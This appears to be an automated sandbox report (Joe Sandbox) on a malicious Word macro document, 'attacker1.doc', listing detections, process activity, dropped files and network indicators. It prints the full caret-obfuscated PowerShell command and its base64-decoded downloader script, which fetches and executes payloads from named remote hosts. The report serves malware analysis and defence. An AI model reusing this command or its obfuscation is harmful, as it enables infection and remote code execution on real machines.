Source: Process Memory Space: cmd.exe PID: 668, type: MEMORYSTR | Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: C:\Users\user\AppData\Local\Temp\~DF527BC4B1A394C70E.TMP, type: DROPPED | Matched rule: SUSP_VBA_FileSystem_Access date = 2019-06-21, author = Florian Roth, description = Detects suspicious VBA that writes to disk and is activated on document open, reference = Internal Research, score = 52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc
Source: ~WRF{DF4B264E-30B7-41FF-92E6-96F7D248F773}.tmp.0.dr | OLE indicator application name: unknown
Source: ~DF527BC4B1A394C70E.TMP.0.dr | OLE indicator application name: unknown
Source: attacker1.doc | OLE, VBA macro line: Sub AutoOpen()
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function AutoOpen, Name: AutoOpen
Source: ~DF527BC4B1A394C70E.TMP.0.dr | OLE, VBA macro line: Sub AutoOpen()
Source: ~WRF{DF4B264E-30B7-41FF-92E6-96F7D248F773}.tmp.0.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF527BC4B1A394C70E.TMP.0.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{DF4B264E-30B7-41FF-92E6-96F7D248F773}.tmp.0.dr | OLE indicator has summary info: false
Source: ~DF527BC4B1A394C70E.TMP.0.dr | OLE indicator has summary info: false
Source: attacker1.doc | OLE indicator, VBA macros: true
Source: ~DF527BC4B1A394C70E.TMP.0.dr | OLE indicator, VBA macros: true
Source: attacker1.doc | Virustotal: Detection: 57%
Source: attacker1.doc | ReversingLabs: Detection: 53%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\cmd.exe CmD /C P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsADQAKAA0ACgAgACAAaQBmACgAJABtAC4ATgBhAG0AZQAgAC0AZQBxACAAIgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAIgApAHsADQAKACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AMQA3ADYALgAzADIALgAzADUALgAxADYALwA3ADAANABlAC4AcABoAHAAIgApAA0ACgAgACAAIAAgACAASQBFAFgAKAAkAG0ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAoACQAdQByAGkAKQApACkAOwANAAoAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKAA0ACgAgACAAfQANAAoADQAKACAAIABpAGYAKAAkAG0ALgBOAGEAbQBlACAALQBlAHEAIAAiAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACIAKQB7AA0ACgAgACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AZgBwAGUAdAByAGEAYQByAGQAZQBsAGwAYQAuAGIAYQBuAGQALwB4AGEAcABfADEAMAAyAGIALQBBAFoAMQAvADcAMAA0AGUALgBwAGgAcAA/AGwAPQBsAGkAdAB0AGUAbgA0AC4AZwBhAHMAIgApAA0ACgAgACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABtAC4ASQBuAHYAbwBrAGUAKAAkAGkAbgBzAHQAYQBuAGMAZQAsACAAKAAkAHUAcgBpACkAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAcABhAHQAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEcAZQB0AEYAbwBsAGQAZQByAFAAYQB0AGgAKAAiAEMAbwBtAG0AbwBuAEEAcABwAGwAaQBjAGEAdABpAG8AbgBEAGEAdABhACIAKQAgACsAIAAiAFwAXABRAGQAWgBHAFAALgBlAHgAZQAiADsADQAKACAAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoACwAIAAkAHIAZQBzAHAAbwBuAHMAZQApADsADQAKAA0ACgAgACAAIAAgACAAJABjAGwAcwBpAGQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEcAdQBpAGQAIAAnAEMAMAA4AEEARgBEADkAMAAtAEYAMgBBADEALQAxADEARAAxAC0AOAA0ADUANQAtADAAMABBADAAQwA5ADEARgAzADgAOAAwACcADQAKACAAIAAgACAAIAAkAHQAeQBwAGUAIAA9ACAAWwBUAHkAcABlAF0AOgA6AEcAZQB0AFQAeQBwAGUARgByAG8AbQBDAEwAUwBJAEQAKAAkAGMAbABzAGkAZAApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAgAD0AIABbAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACQAdAB5AHAAZQApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAuAEQAbwBjAHUAbQBlAG4AdAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAJABwAGEAdABoACwAJABuAHUAbAAsACAAJABuAHUAbAAsACAAJABuAHUAbAAsADAAKQANAAoADQAKACAAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKACAAIAAgACAAIAANAAoAIAAgAH0ADQAKAH0ADQAKAA0ACgBFAHgAaQB0ADsADQAKAA0ACgA=
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERSHELL -NoProfile -ExecutionPolicy B^ypass -encodedcommand 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
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe CmD /C P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand 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Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERSHELL -NoProfile -ExecutionPolicy B^ypass -encodedcommand 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Jump to behavior
      Source: attacker1.doc OLE indicator, Word Document stream: true
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$tacker1.doc
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC59F.tmp
      Source: classification engine Classification label: mal100.bank.expl.evad.winDOC@5/16@1/1
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
      Source: ~WRF{DF4B264E-30B7-41FF-92E6-96F7D248F773}.tmp.0.dr OLE document summary: title field not present or empty
      Source: ~WRF{DF4B264E-30B7-41FF-92E6-96F7D248F773}.tmp.0.dr OLE document summary: author field not present or empty
      Source: ~WRF{DF4B264E-30B7-41FF-92E6-96F7D248F773}.tmp.0.dr OLE document summary: edited time not present or 0
      Source: ~DF527BC4B1A394C70E.TMP.0.dr OLE document summary: title field not present or empty
      Source: ~DF527BC4B1A394C70E.TMP.0.dr OLE document summary: author field not present or empty
      Source: ~DF527BC4B1A394C70E.TMP.0.dr OLE document summary: edited time not present or 0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: Window Recorder Window detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: attacker1.doc Initial sample: OLE summary comments = Re-contextualized radical service-desk
      Source: Binary string: :\Windows\System.pdb source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
      Source: Binary string: C:\Windows\mscorlib.pdb source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
      Source: Binary string: :\Windows\dll\System.pdb source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb=C:\ source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
      Source: Binary string: ws\System.pdbpdbtem.pdbb) source: powershell.exe, 00000004.00000002.403657239.0000000002BE4000.00000004.00000040.sdmp
      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbamDa source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
      Source: Binary string: >ystem.pdb source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
      Source: Binary string: ws\symbols\dll\System.pdbc5 source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
      Source: Binary string: System.pdb2 source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb:\Pr source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
      Source: Binary string: ??\C:\Windows\System.pdbpdbtem.pdbm\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000004.00000002.406637790.000000001B4B0000.00000004.00000001.sdmp
      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
      Source: Binary string: System.pdb source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
      Source: Binary string: System.pdb8 source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
      Source: attacker1.doc Initial sample: OLE document summary bytes = 23552
      Source: attacker1.doc Initial sample: OLE document summary manager = Mr. Granville McGlynn
      Source: attacker1.doc Initial sample: OLE summary subject = West Virginia Samanta
      Source: ~WRF{DF4B264E-30B7-41FF-92E6-96F7D248F773}.tmp.0.dr Initial sample: OLE indicators vbamacros = False

      Data Obfuscation:

      Document contains an embedded VBA with many string operations indicating source code obfuscation
      Source: attacker1.doc Stream path 'Macros/VBA/ThisDocument' : High number of string operations
      Source: VBA code instrumentation OLE, VBA macro, High number of string operations: Module ThisDocument; Name: ThisDocument
      Source: ~DF527BC4B1A394C70E.TMP.0.dr Stream path 'VBA/ThisDocument' : High number of string operations
      Obfuscated command line found
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\cmd.exe CmD /C P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand [base64 blob omitted]
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERSHELL -NoProfile -ExecutionPolicy B^ypass -encodedcommand [base64 blob omitted]
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2800 Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
      Source: powershell.exe, 00000004.00000002.402979711.0000000000490000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion:

      Encrypted powershell cmdline option found
      Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded $instance = [System.Activator]::CreateInstance("System.Net.WebClient");$method = [System.Net.WebClient].GetMethods();foreach($m in $method){ if($m.Name -eq "DownloadString"){ try{ $uri = New-Object System.Uri("http://176.32.35.16/704e.php") IEX($m.Invoke($instance, ($uri))); }catch{} } if($m.Name -eq "DownloadData"){ try{ $uri = New-Object System.Uri("http://fpetraardella.band/xap_102b-AZ1/704e.php?l=litten4.gas") $response = $m.Invoke($instance, ($uri)); $path = [System.Environment]::GetFolderPath("CommonApplicationData") + "\\QdZGP.exe"; [System.IO.File]::WriteAllBytes($path, $response); $clsid = New-Object Guid 'C08AFD90-F2A1-11D1-8455-00A0C91F3880' $type = [Type]::GetTypeFromCLSID($clsid) $object = [Activator]::CreateInstance($type) $object.Document.Application.ShellExecute($path,$nul, $nul, $nul,0) }catch{} }}Exit;
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\cmd.exe CmD /C P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand [base64 blob omitted]
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERSHELL -NoProfile -ExecutionPolicy B^ypass -encodedcommand [base64 blob omitted]

      Language, Device and Operating System Detection:

      Yara detected Obfuscated Powershell
      Source: Yara match File source: attacker1.doc, type: SAMPLE
      Source: Yara match File source: 00000002.00000002.408387052.00000000004A4000.00000004.00000040.sdmp, type: MEMORY
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation

      Mitre Att&ck Matrix

      Techniques listed per tactic column of the matrix; a matched technique carries its count in parentheses.

      Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
      Execution: Command and Scripting Interpreter (21); Scripting (32); Exploitation for Client Execution (13); PowerShell (2); Cron; Launchd; Scheduled Task
      Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
      Privilege Escalation: Process Injection (11); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
      Defense Evasion: Masquerading (1); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (21); Process Injection (11); Deobfuscate/Decode Files or Information (2); Scripting (32); Obfuscated Files or Information (1)
      Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
      Discovery: Security Software Discovery (1); Process Discovery (1); Virtualization/Sandbox Evasion (21); Remote System Discovery (1); File and Directory Discovery (2); System Information Discovery (11); Network Sniffing
      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
      Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
      Command and Control: Ingress Tool Transfer (4); Non-Application Layer Protocol (3); Application Layer Protocol (3); Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port
      Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
      Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
      Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact

      Behavior Graph


      Screenshots


      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

Source | Detection | Scanner | Label
attacker1.doc | 58% | Virustotal |
attacker1.doc | 54% | ReversingLabs | Document-Office.Trojan.Valyria
attacker1.doc | 100% | Avira | HEUR/Macro.Downloader.MRPU.Gen
attacker1.doc | 100% | Joe Sandbox ML |

      Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\~DF527BC4B1A394C70E.TMP | 100% | Avira | HEUR/Macro.Downloader.MRPU.Gen
C:\Users\user\AppData\Local\Temp\~DF527BC4B1A394C70E.TMP | 100% | Joe Sandbox ML |

      Unpacked PE Files

      No Antivirus matches

      Domains

Source | Detection | Scanner | Label
fpetraardella.band | 2% | Virustotal |

      URLs

Source | Detection | Scanner | Label
http://176.32.35 | 0% | Avira URL Cloud | safe
http://176.32.35.16/704e.php | 4% | Virustotal |
http://176.32.35.16/704e.php | 0% | Avira URL Cloud | safe
http://176.32.35.16 | 3% | Virustotal |
http://176.32.35.16 | 0% | Avira URL Cloud | safe
http://fpetraardella.band/xap_102b-AZ1/704e.php?l=litten4.gas | 16% | Virustotal |
http://fpetraardella.band/xap_102b-AZ1/704e.php?l=litten4.gas | 0% | Avira URL Cloud | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://fpetraardella.band | 2% | Virustotal |
http://fpetraardella.band | 0% | Avira URL Cloud | safe
http://fpetraardella.band/xap_102b-AZ1/704e.php?l=litten4.gasPE | 0% | Avira URL Cloud | safe
http://176.32.35.16/704e.phpPE | 0% | Avira URL Cloud | safe
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe
http://fpetraardella.band/xap_10 | 0% | Avira URL Cloud | safe

      Domains and IPs

      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
fpetraardella.band | unknown | unknown | false | | unknown

      Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://176.32.35.16/704e.php | false | 4%, Virustotal; Avira URL Cloud: safe | unknown

      URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous | powershell.exe, 00000004.00000002.403229716.00000000024A0000.00000002.00020000.sdmp | false | | high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | powershell.exe, 00000004.00000002.402979711.0000000000490000.00000004.00000020.sdmp | false | | high
http://176.32.35 | powershell.exe, 00000004.00000002.405049147.0000000003667000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://176.32.35.16 | powershell.exe, 00000004.00000002.405302772.0000000003867000.00000004.00000001.sdmp | false | 3%, Virustotal; Avira URL Cloud: safe | unknown
http://fpetraardella.band/xap_102b-AZ1/704e.php?l=litten4.gas | powershell.exe, 00000004.00000002.405049147.0000000003667000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.406785690.000000001B54F000.00000004.00000001.sdmp | true | 16%, Virustotal; Avira URL Cloud: safe | unknown
http://www.piriform.com/ccleaner | powershell.exe, 00000004.00000002.402979711.0000000000490000.00000004.00000020.sdmp | false | | high
http://www.%s.comPA | powershell.exe, 00000004.00000002.403229716.00000000024A0000.00000002.00020000.sdmp | false | URL Reputation: safe | low
http://fpetraardella.band | powershell.exe, 00000004.00000002.405302772.0000000003867000.00000004.00000001.sdmp | false | 2%, Virustotal; Avira URL Cloud: safe | unknown
http://fpetraardella.band/xap_102b-AZ1/704e.php?l=litten4.gasPE | powershell.exe, 00000004.00000002.405049147.0000000003667000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://176.32.35.16/704e.phpPE | powershell.exe, 00000004.00000002.405049147.0000000003667000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://servername/isapibackend.dll | cmd.exe, 00000002.00000002.408500730.0000000001BD0000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low
http://fpetraardella.band/xap_10 | powershell.exe, 00000004.00000002.405049147.0000000003667000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown

            Contacted IPs


            Public

IP | Domain | Country | ASN | ASN Name | Malicious
176.32.35.16 | unknown | Russian Federation | 51659 | ASBAXETRU | false

            General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 520834
Start date: 12.11.2021
Start time: 20:54:13
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 4m 41s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: attacker1.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.bank.expl.evad.winDOC@5/16@1/1
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 1
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .doc
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
            • Execution Graph export aborted for target powershell.exe, PID 2984 because it is empty
• Not all processes were analyzed, report is missing behavior information
            • Report size getting too big, too many NtQueryAttributesFile calls found.

            Simulations

            Behavior and APIs

Time | Type | Description
20:55:14 | API Interceptor | 21x Sleep call for process: powershell.exe modified

            Joe Sandbox View / Context

            IPs

Match | Associated Sample Name / URL | SHA 256 | Detection | Context
176.32.35.16 | Request12.doc | | malicious | 176.32.35.16/704e.php
| Request12.doc | | malicious | 176.32.35.16/704e.php
| Request12.doc | | malicious | 176.32.35.16/704e.php

            Domains

            No context

            ASN


            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\43824A17.wmf
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: Targa image data - Map - RLE 28 x 65536 x 0 +7 "\004"
Category: dropped
Size (bytes): 730
Entropy (8bit): 3.098760582869104
Encrypted: false
SSDEEP: 12:MBZp0zSnM+vdd81lH8q0QqKmSuWnTd9WsXAnfexozOKSwMfiTQMfiTPPPEzG1lH9:A0zP+vddqqKm3WnXZXAnufiT7fiTYbF2
MD5: 8240B44F053C5ED87915946D7B08BC56
SHA1: E7653365649AA3DDEE4A05A9298FBD05CC72212D
SHA-256: FB228D6FCF54CAFC494C8AF1162CB709422FADAB5A4A6FC2749D3FFD6F25131D
SHA-512: BE54D01E73B63DFAF3B70DB589FC11D1E650BC708ABD6EC938E00F0D620D2DDB258F6929E83DF323F75ABC54BCC61B5F25135DAFCAA2CA756DD929530D4E2608
Malicious: false
Reputation: low
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\529AC81A.wmf
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: Targa image data - Map - RLE 28 x 65536 x 0 +7 "\004"
Category: dropped
Size (bytes): 730
Entropy (8bit): 3.098760582869104
Encrypted: false
SSDEEP: 12:MBZp0zSnM+vdd81lH8q0QqKmSuWnTd9WsXAnfexozOKSwMfiTQMfiTPPPEzG1lH9:A0zP+vddqqKm3WnXZXAnufiT7fiTYbF2
MD5: 8240B44F053C5ED87915946D7B08BC56
SHA1: E7653365649AA3DDEE4A05A9298FBD05CC72212D
SHA-256: FB228D6FCF54CAFC494C8AF1162CB709422FADAB5A4A6FC2749D3FFD6F25131D
SHA-512: BE54D01E73B63DFAF3B70DB589FC11D1E650BC708ABD6EC938E00F0D620D2DDB258F6929E83DF323F75ABC54BCC61B5F25135DAFCAA2CA756DD929530D4E2608
Malicious: false
Reputation: low
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\63FA92EE.wmf
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: Targa image data - Map - RLE 28 x 65536 x 0 +7 "\004"
Category: dropped
Size (bytes): 730
Entropy (8bit): 3.098760582869104
Encrypted: false
SSDEEP: 12:MBZp0zSnM+vdd81lH8q0QqKmSuWnTd9WsXAnfexozOKSwMfiTQMfiTPPPEzG1lH9:A0zP+vddqqKm3WnXZXAnufiT7fiTYbF2
MD5: 8240B44F053C5ED87915946D7B08BC56
SHA1: E7653365649AA3DDEE4A05A9298FBD05CC72212D
SHA-256: FB228D6FCF54CAFC494C8AF1162CB709422FADAB5A4A6FC2749D3FFD6F25131D
SHA-512: BE54D01E73B63DFAF3B70DB589FC11D1E650BC708ABD6EC938E00F0D620D2DDB258F6929E83DF323F75ABC54BCC61B5F25135DAFCAA2CA756DD929530D4E2608
Malicious: false
Reputation: low
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9361ED2C.wmf
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: Targa image data - Map - RLE 28 x 65536 x 0 +7 "\004"
Category: dropped
Size (bytes): 730
Entropy (8bit): 3.098760582869104
Encrypted: false
SSDEEP: 12:MBZp0zSnM+vdd81lH8q0QqKmSuWnTd9WsXAnfexozOKSwMfiTQMfiTPPPEzG1lH9:A0zP+vddqqKm3WnXZXAnufiT7fiTYbF2
MD5: 8240B44F053C5ED87915946D7B08BC56
